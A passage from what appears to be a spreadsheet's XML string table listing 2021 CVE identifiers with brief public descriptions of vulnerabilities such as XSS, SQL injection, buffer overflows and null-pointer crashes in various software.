    <t>In GNOME evolution-rss through 0.3.96, network-soup.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.</t>
  </si>
  <si>
    <t>CVE-2021-39362</t>
  </si>
  <si>
    <t>An XSS issue was discovered in ReCaptcha Solver 5.7. A response from Anti-Captcha.com, RuCaptcha.com, 2captcha.com, DEATHbyCAPTCHA.com, ImageTyperz.com, or BestCaptchaSolver.com in setCaptchaCode() is inserted into the DOM as HTML, resulting in full control over the user's browser by these servers.</t>
  </si>
  <si>
    <t>CVE-2021-39363</t>
  </si>
  <si>
    <t>Honeywell HDZP252DI 1.00.HW02.4 and HBW2PER1 1.000.HW01.3 devices allow a video replay attack after ARP cache poisoning has been achieved.</t>
  </si>
  <si>
    <t>CVE-2021-39364</t>
  </si>
  <si>
    <t>Honeywell HDZP252DI 1.00.HW02.4 and HBW2PER1 1.000.HW01.3 devices allow command spoofing (for camera control) after ARP cache poisoning has been achieved.</t>
  </si>
  <si>
    <t>CVE-2021-39365</t>
  </si>
  <si>
    <t>In GNOME grilo though 0.3.13, grl-net-wc.c does not enable TLS certificate verification on the SoupSessionAsync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.</t>
  </si>
  <si>
    <t>CVE-2021-39367</t>
  </si>
  <si>
    <t>Canon Oce Print Exec Workgroup 1.3.2 allows Host header injection.</t>
  </si>
  <si>
    <t>CVE-2021-39368</t>
  </si>
  <si>
    <t>Canon Oce Print Exec Workgroup 1.3.2 allows XSS via the lang parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39371</t>
  </si>
  <si>
    <t>An XML external entity (XXE) injection in PyWPS before 4.4.5 allows an attacker to view files on the application server filesystem by assigning a path to the entity. OWSLib 0.24.1 may also be affected.</t>
  </si>
  <si>
    <t>CVE-2021-39373</t>
  </si>
  <si>
    <t>Samsung Drive Manager 2.0.104 on Samsung H3 devices allows attackers to bypass intended access controls on disk management. WideCharToMultiByte, WideCharStr, and MultiByteStr can contribute to password exposure.</t>
  </si>
  <si>
    <t>CVE-2021-39375</t>
  </si>
  <si>
    <t>Philips Healthcare Tasy Electronic Medical Record (EMR) 3.06 allows SQL injection via the WAdvancedFilter/getDimensionItemsByCode FilterValue parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39376</t>
  </si>
  <si>
    <t>Philips Healthcare Tasy Electronic Medical Record (EMR) 3.06 allows SQL injection via the CorCad_F2/executaConsultaEspecifico IE_CORPO_ASSIST or CD_USUARIO_CONVENIO parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39377</t>
  </si>
  <si>
    <t>A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the index.php username parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39378</t>
  </si>
  <si>
    <t>A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the NamesList.php str parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39379</t>
  </si>
  <si>
    <t>A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the ResetUserInfo.php password_stn_id parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3938</t>
  </si>
  <si>
    <t>CVE-2021-39383</t>
  </si>
  <si>
    <t>DWSurvey v3.2.0 was discovered to contain a remote command execution (RCE) vulnerability via the component /sysuser/SysPropertyAction.java.</t>
  </si>
  <si>
    <t>CVE-2021-39384</t>
  </si>
  <si>
    <t>DWSurvey v3.2.0 was discovered to contain an arbitrary file write vulnerability via the component /utils/ToHtmlServlet.java.</t>
  </si>
  <si>
    <t>CVE-2021-3939</t>
  </si>
  <si>
    <t>Ubuntu-specific modifications to accountsservice (in patch file debian/patches/0010-set-language.patch) caused the fallback_locale variable, pointing to static storage, to be freed, in the user_change_language_authorized_cb function. This is reachable via the SetLanguage dbus function. This is fixed in versions 0.6.55-0ubuntu12~20.04.5, 0.6.55-0ubuntu13.3, 0.6.55-0ubuntu14.1.</t>
  </si>
  <si>
    <t>CVE-2021-39390</t>
  </si>
  <si>
    <t>Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39391</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in the admin panel in Beego v2.0.1 via the URI path in an HTTP request, which is activated by administrators viewing the "Request Statistics" page.</t>
  </si>
  <si>
    <t>CVE-2021-39392</t>
  </si>
  <si>
    <t>The management tool in MyLittleBackup up to and including 1.7 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.</t>
  </si>
  <si>
    <t>CVE-2021-39393</t>
  </si>
  <si>
    <t>mm-wiki v0.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the markdown editor.</t>
  </si>
  <si>
    <t>CVE-2021-39394</t>
  </si>
  <si>
    <t>mm-wiki v0.2.1 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add user accounts and modify user information.</t>
  </si>
  <si>
    <t>CVE-2021-39402</t>
  </si>
  <si>
    <t>MaianAffiliate v.1.0 is suffers from code injection by adding a new product via the admin panel. The injected payload is reflected on the affiliate main page for all authenticated and unauthenticated visitors.</t>
  </si>
  <si>
    <t>CVE-2021-39404</t>
  </si>
  <si>
    <t>MaianAffiliate v1.0 allows an authenticated administrative user to save an XSS to the database.</t>
  </si>
  <si>
    <t>CVE-2021-39408</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in Online Student Rate System 1.0 via the page parameter on the index.php file</t>
  </si>
  <si>
    <t>CVE-2021-39409</t>
  </si>
  <si>
    <t>A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.</t>
  </si>
  <si>
    <t>CVE-2021-3941</t>
  </si>
  <si>
    <t>In ImfChromaticities.cpp routine RGBtoXYZ(), there are some division operations such as `float Z = (1 - chroma.white.x - chroma.white.y) * Y / chroma.white.y;` and `chroma.green.y * (X + Z))) / d;` but the divisor is not checked for a 0 value. A specially crafted file could trigger a divide-by-zero condition which could affect the availability of programs linked with OpenEXR.</t>
  </si>
  <si>
    <t>CVE-2021-39411</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exist in PHPGurukul Hospital Management System 4.0 via the (1) searchdata parameter in (a) doctor/search.php and (b) admin/patient-search.php, and the (2) fromdate and (3) todate parameters in admin/betweendates-detailsreports.php.</t>
  </si>
  <si>
    <t>CVE-2021-39412</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exists in PHPGurukul Shopping v3.1 via the (1) callback parameter in (a) server_side/scripts/id_jsonp.php, (b) server_side/scripts/jsonp.php, and (c) scripts/objects_jsonp.php, the (2) value parameter in examples_support/editable_ajax.php, and the (3) PHP_SELF parameter in captcha/index.php.</t>
  </si>
  <si>
    <t>CVE-2021-39413</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exits in SEO Panel v4.8.0 via the (1) to_time parameter in (a) backlinks.php, (b) analytics.php, (c) log.php, (d) overview.php, (e) pagespeed.php, (f) rank.php, (g) review.php, (h) saturationchecker.php, (i) social_media.php, and (j) reports.php; the (2) from_time parameter in (a) backlinks.php, (b) analytics.php, (c) log.php, (d) overview.php, (e) pagespeed.php, (f) rank.php, (g) review.php, (h) saturationchecker.php, (i) social_media.php, (j) webmaster-tools.php, and (k) reports.php; the (3) order_col parameter in (a) analytics.php, (b) review.php, (c) social_media.php, and (d) webmaster-tools.php; and the (4) pageno parameter in (a) alerts.php, (b) log.php, (c) keywords.php, (d) proxy.php, (e) searchengine.php, and (f) siteauditor.php.</t>
  </si>
  <si>
    <t>CVE-2021-39416</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exists in Remote Clinic v2.0 in (1) patients/register-patient.php via the (a) Contact, (b) Email, (c) Weight, (d) Profession, (e) ref_contact, (f) address, (g) gender, (h) age, and (i) serial parameters; in (2) patients/edit-patient.php via the (a) Contact, (b) Email, (c) Weight, Profession, (d) ref_contact, (e) address, (f) serial, (g) age, and (h) gender parameters; in (3) staff/edit-my-profile.php via the (a) Title, (b) First Name, (c) Last Name, (d) Skype, and (e) Address parameters; and in (4) clinics/settings.php via the (a) portal_name, (b) guardian_short_name, (c) guardian_name, (d) opening_time, (e) closing_time, (f) access_level_5, (g) access_level_4, (h) access_level_ 3, (i) access_level_2, (j) access_level_1, (k) currency, (l) mobile_number, (m) address, (n) patient_contact, (o) patient_address, and (p) patient_email parameters.</t>
  </si>
  <si>
    <t>CVE-2021-39420</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exist in VFront 0.99.5 via the (1) s parameter in search_all.php and the (2) msg parameter in add.attach.php.</t>
  </si>
  <si>
    <t>CVE-2021-3943</t>
  </si>
  <si>
    <t>A flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A remote code execution risk when restoring backup files was identified.</t>
  </si>
  <si>
    <t>CVE-2021-39432</t>
  </si>
  <si>
    <t>diplib v3.0.0 is vulnerable to Double Free.</t>
  </si>
  <si>
    <t>CVE-2021-39433</t>
  </si>
  <si>
    <t>A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.</t>
  </si>
  <si>
    <t>CVE-2021-3944</t>
  </si>
  <si>
    <t>bookstack is vulnerable to Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>CVE-2021-3945</t>
  </si>
  <si>
    <t>django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-39458</t>
  </si>
  <si>
    <t>Triggering an error page of the import process in Yakamara Media Redaxo CMS version 5.12.1 allows an authenticated CMS user has to alternate the files of a vaild file backup. This leads of leaking the database credentials in the environment variables.</t>
  </si>
  <si>
    <t>CVE-2021-39459</t>
  </si>
  <si>
    <t>Remote code execution in the modules component in Yakamara Media Redaxo CMS version 5.12.1 allows an authenticated CMS user to execute code on the hosting system via a module containing malicious PHP code.</t>
  </si>
  <si>
    <t>CVE-2021-3947</t>
  </si>
  <si>
    <t>A stack-buffer-overflow was found in QEMU in the NVME component. The flaw lies in nvme_changed_nslist() where a malicious guest controlling certain input can read out of bounds memory. A malicious user could use this flaw leading to disclosure of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-39473</t>
  </si>
  <si>
    <t>Saibamen HotelManager v1.2 is vulnerable to Cross Site Scripting (XSS) due to improper sanitization of comment and contact fields.</t>
  </si>
  <si>
    <t>CVE-2021-39474</t>
  </si>
  <si>
    <t>Vulnerability in the product Docsis 3.0 UBC1319BA00 Router supported affected version 1319010201r009. The vulnerability allows an attacker with privileges and network access through the ping.cmd component to execute commands on the device.</t>
  </si>
  <si>
    <t>CVE-2021-3948</t>
  </si>
  <si>
    <t>An incorrect default permissions vulnerability was found in the mig-controller. Due to an incorrect cluster namespaces handling an attacker may be able to migrate a malicious workload to the target cluster, impacting confidentiality, integrity, and availability of the services located on that cluster.</t>
  </si>
  <si>
    <t>CVE-2021-39480</t>
  </si>
  <si>
    <t>Bingrep v0.8.5 was discovered to contain a memory allocation failure which can cause a Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2021-39486</t>
  </si>
  <si>
    <t>A Stored XSS via Malicious File Upload exists in Gila CMS version 2.2.0. An attacker can use this to steal cookies, passwords or to run arbitrary code on a victim's browser.</t>
  </si>
  <si>
    <t>CVE-2021-39491</t>
  </si>
  <si>
    <t>A Cross Site Scripting (XSS) vulnerability exists in Yogesh Ojha reNgine v1.0 via the Scan Engine name file in the Scan Engine deletion confirmation modal box . .</t>
  </si>
  <si>
    <t>CVE-2021-39496</t>
  </si>
  <si>
    <t>Eyoucms 1.5.4 lacks sanitization of input data, allowing an attacker to inject malicious code into `filename` param to trigger Reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2021-39497</t>
  </si>
  <si>
    <t>eyoucms 1.5.4 lacks sanitization of input data, allowing an attacker to inject a url to trigger blind SSRF via the saveRemote() function.</t>
  </si>
  <si>
    <t>CVE-2021-39499</t>
  </si>
  <si>
    <t>A Cross-site scripting (XSS) vulnerability in Users in Qiong ICP EyouCMS 1.5.4 allows remote attackers to inject arbitrary web script or HTML via the `title` parameter in bind_email function.</t>
  </si>
  <si>
    <t>CVE-2021-3950</t>
  </si>
  <si>
    <t>CVE-2021-39500</t>
  </si>
  <si>
    <t>Eyoucms 1.5.4 is vulnerable to Directory Traversal. Due to a lack of input data sanitizaton in param tpldir, filename, type, nid an attacker can inject "../" to escape and write file to writeable directories.</t>
  </si>
  <si>
    <t>CVE-2021-39501</t>
  </si>
  <si>
    <t>EyouCMS 1.5.4 is vulnerable to Open Redirect. An attacker can redirect a user to a malicious url via the Logout function.</t>
  </si>
  <si>
    <t>CVE-2021-39503</t>
  </si>
  <si>
    <t>PHPMyWind 5.6 is vulnerable to Remote Code Execution. Becase input is filtered without "&lt;, &gt;, ?, =, `,...." In WriteConfig() function, an attacker can inject php code to /include/config.cache.php file.</t>
  </si>
  <si>
    <t>CVE-2021-39509</t>
  </si>
  <si>
    <t>An issue was discovered in D-Link DIR-816 DIR-816A2_FWv1.10CNB05_R1B011D88210 The HTTP request parameter is used in the handler function of /goform/form2userconfig.cgi route, which can construct the user name string to delete the user function. This can lead to command injection through shell metacharacters.</t>
  </si>
  <si>
    <t>CVE-2021-39510</t>
  </si>
  <si>
    <t>An issue was discovered in D-Link DIR816_A1_FW101CNB04 750m11ac wireless router, The HTTP request parameter is used in the handler function of /goform/form2userconfig.cgi route, which can construct the user name string to delete the user function. This can lead to command injection through shell metacharacters.</t>
  </si>
  <si>
    <t>CVE-2021-39514</t>
  </si>
  <si>
    <t>An issue was discovered in libjpeg through 2020021. An uncaught floating point exception in the function ACLosslessScan::ParseMCU() located in aclosslessscan.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39515</t>
  </si>
  <si>
    <t>An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function SampleInterleavedLSScan::ParseMCU() located in sampleinterleavedlsscan.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39516</t>
  </si>
  <si>
    <t>An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function HuffmanDecoder::Get() located in huffmandecoder.hpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39517</t>
  </si>
  <si>
    <t>An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function BlockBitmapRequester::ReconstructUnsampled() located in blockbitmaprequester.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39518</t>
  </si>
  <si>
    <t>An issue was discovered in libjpeg through 2020021. LineBuffer::FetchRegion() in linebuffer.cpp has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39519</t>
  </si>
  <si>
    <t>An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function BlockBitmapRequester::PullQData() located in blockbitmaprequester.cpp It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39520</t>
  </si>
  <si>
    <t>An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function BlockBitmapRequester::PushReconstructedData() located in blockbitmaprequester.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39521</t>
  </si>
  <si>
    <t>An issue was discovered in libredwg through v0.10.1.3751. A NULL pointer dereference exists in the function bit_read_BB() located in bits.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39522</t>
  </si>
  <si>
    <t>An issue was discovered in libredwg through v0.10.1.3751. bit_wcs2len() in bits.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39523</t>
  </si>
  <si>
    <t>An issue was discovered in libredwg through v0.10.1.3751. A NULL pointer dereference exists in the function check_POLYLINE_handles() located in decode.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39525</t>
  </si>
  <si>
    <t>An issue was discovered in libredwg through v0.10.1.3751. bit_read_fixed() in bits.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39527</t>
  </si>
  <si>
    <t>An issue was discovered in libredwg through v0.10.1.3751. appinfo_private() in decode.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39528</t>
  </si>
  <si>
    <t>An issue was discovered in libredwg through v0.10.1.3751. dwg_free_MATERIAL_private() in dwg.spec has a double free.</t>
  </si>
  <si>
    <t>CVE-2021-39530</t>
  </si>
  <si>
    <t>An issue was discovered in libredwg through v0.10.1.3751. bit_wcs2nlen() in bits.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39531</t>
  </si>
  <si>
    <t>An issue was discovered in libslax through v0.22.1. slaxLexer() in slaxlexer.c has a stack-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39532</t>
  </si>
  <si>
    <t>An issue was discovered in libslax through v0.22.1. A NULL pointer dereference exists in the function slaxLexer() located in slaxlexer.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39533</t>
  </si>
  <si>
    <t>An issue was discovered in libslax through v0.22.1. slaxLexer() in slaxlexer.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39534</t>
  </si>
  <si>
    <t>An issue was discovered in libslax through v0.22.1. slaxIsCommentStart() in slaxlexer.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39535</t>
  </si>
  <si>
    <t>An issue was discovered in libxsmm through v1.16.1-93. A NULL pointer dereference exists in JIT code. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39536</t>
  </si>
  <si>
    <t>An issue was discovered in libxsmm through v1.16.1-93. The JIT code has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39537</t>
  </si>
  <si>
    <t>An issue was discovered in ncurses through v6.2-1. _nc_captoinfo in captoinfo.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39538</t>
  </si>
  <si>
    <t>An issue was discovered in pdftools through 20200714. A NULL pointer dereference exists in the function node::ObjNode::Value() located in objnode.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39539</t>
  </si>
  <si>
    <t>An issue was discovered in pdftools through 20200714. A NULL pointer dereference exists in the function node::BDCNode::~BDCNode() located in bdcnode.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39540</t>
  </si>
  <si>
    <t>An issue was discovered in pdftools through 20200714. A stack-buffer-overflow exists in the function Analyze::AnalyzePages() located in analyze.cpp. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39541</t>
  </si>
  <si>
    <t>An issue was discovered in pdftools through 20200714. A NULL pointer dereference exists in the function Analyze::AnalyzeXref() located in analyze.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39542</t>
  </si>
  <si>
    <t>An issue was discovered in pdftools through 20200714. A NULL pointer dereference exists in the function Font::Size() located in font.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39543</t>
  </si>
  <si>
    <t>An issue was discovered in pdftools through 20200714. A NULL pointer dereference exists in the function Analyze::AnalyzeRoot() located in analyze.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39544</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. file::WavFile::writeToFile() in wav_file.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39545</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function rice::RiceDecoder::process() located in rice_decoder.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39546</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. rice::RiceDecoder::process() in rice_decoder.cpp has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39547</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function lpc::SampleGenerator::process() located in sample_generator.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39548</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function frame::FrameDecoder::process() located in frame_decoder.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39549</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function file::WavFile::WavFile() located in wav_file.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39550</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. file::SelaFile::readFromFile() in sela_file.cpp has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39551</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. file::SelaFile::readFromFile() in sela_file.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39552</t>
  </si>
  <si>
    <t>An issue was discovered in sela through 20200412. file::WavFile::readFromFile() in wav_file.c has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39553</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function grealloc() located in gmem.cc. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39554</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function Lexer::Lexer() located in Lexer.cc. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39555</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function InfoOutputDev::type3D0() located in InfoOutputDev.cc. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39556</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function InfoOutputDev::type3D1() located in InfoOutputDev.cc. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39557</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function copyString() located in gmem.cc. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39558</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A stack-buffer-overflow exists in the function VectorGraphicOutputDev::drawGeneralImage() located in VectorGraphicOutputDev.cc. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39559</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function GString::~GString() located in GString.cc. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-3956</t>
  </si>
  <si>
    <t>A read-only authentication bypass vulnerability was reported in the Third Quarter 2021 release of Lenovo XClarity Controller (XCC) firmware affecting XCC devices configured in LDAP Authentication Only Mode and using an LDAP server that supports “unauthenticated bind”, such as Microsoft Active Directory. An unauthenticated user can gain read-only access to XCC in such a configuration, thereby allowing the XCC device configuration to be viewed but not changed. XCC devices configured to use local authentication, LDAP Authentication + Authorization Mode, or LDAP servers that support only “authenticated bind” and/or “anonymous bind” are not affected.</t>
  </si>
  <si>
    <t>CVE-2021-39561</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A stack-buffer-overflow exists in the function Gfx::opSetFillColorN() located in Gfx.cc. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39562</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function FileStream::makeSubStream() located in Stream.cc. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39563</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_DumpActions() located in swfaction.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39564</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function swf_DumpActions() located in swfaction.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39569</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function OpAdvance() located in swfaction.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-3957</t>
  </si>
  <si>
    <t>kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>CVE-2021-39574</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function pool_read() located in pool.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39575</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function dump_method() located in abc.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39577</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function main() located in swfdump.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39579</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function string_hash() located in q.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-3958</t>
  </si>
  <si>
    <t>Due to improper sanitization iPack SCADA Automation software suffers from a remote SQL injection vulnerability. An unauthenticated attacker with the web access is able to extract critical information from the system.</t>
  </si>
  <si>
    <t>CVE-2021-39582</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function swf_GetPlaceObject() located in swfobject.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39583</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function pool_lookup_string2() located in pool.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39584</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function namespace_set_hash() located in pool.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39585</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function traits_dump() located in abc.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39587</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_DumpABC() located in abc.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39588</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_ReadABC() located in abc.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39589</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function parse_metadata() located in abc.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-3959</t>
  </si>
  <si>
    <t>A Server-Side Request Forgery (SSRF) vulnerability in the EPPUpdateService component of Bitdefender Endpoint Security Tools allows an attacker to proxy requests to the relay server. This issue affects: Bitdefender Bitdefender GravityZone versions prior to 3.3.8.272</t>
  </si>
  <si>
    <t>CVE-2021-39590</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function params_dump() located in abc.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39591</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_GetShapeBoundingBox() located in swfshape.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39592</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function pool_lookup_uint() located in pool.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39593</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_FontExtract_DefineFontInfo() located in swftext.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39594</t>
  </si>
  <si>
    <t>Other An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function updateusage() located in swftext.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39595</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A stack-buffer-overflow exists in the function rfx_alloc() located in mem.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-39596</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function code_parse() located in code.c. It allows an attacker to cause Denial of Service.</t>
